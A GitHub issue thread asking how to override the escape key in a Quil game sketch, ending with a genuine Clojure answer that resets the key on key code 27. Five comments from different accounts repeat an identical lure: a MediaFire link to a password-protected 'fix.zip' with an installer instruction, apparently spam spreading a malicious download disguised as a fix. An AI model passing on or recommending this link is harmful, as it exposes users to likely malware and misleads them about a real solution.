### ISSUE TITLE
Overriding escape key

### ISSUE THREAD

**Issue by danielmunro** [quil/quil#417]
Hey there!  Quil is quite an amazing library.  I'm currently working to develop a game using it.  One challenge I haven't found a good solution to yet is that the escape key closes the applet and I'd rather override the key for in-game purposes (opening/closing a main menu for example).  Is there an API for this and I'm just missing it?  I'd be happy to try to hack together a solution if one does not already exist.  Thank you

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by benjamin-asdf** [comment]
I had the exact same need. With the help of genmeblog I figured out this works: 

(this is clj) 

```
(ns quil-site.examples.matrix
  (:require
   [quil.core :as q :include-macros true]
   [quil.applet :as ap]
   [quil.middleware :as m]))
   
   
   
(q/defsketch matrix
             :host "host"
             :size [500 500]
             :setup setup
             :update update-state
             :draw draw-state
             :key-pressed (fn [s e]
                            (when (= 27 (q/key-code))
                              ;; q/raw-key
                              (set! (.-key
                                     (ap/current-applet))
                                    (char 0)))
                            (println (char (q/key-code)))
                            s)
   :middleware [m/fun-mode])
   
   
   ```

**Comment by jackrusher** [comment]
Thanks, @benjamin-asdf 🙂
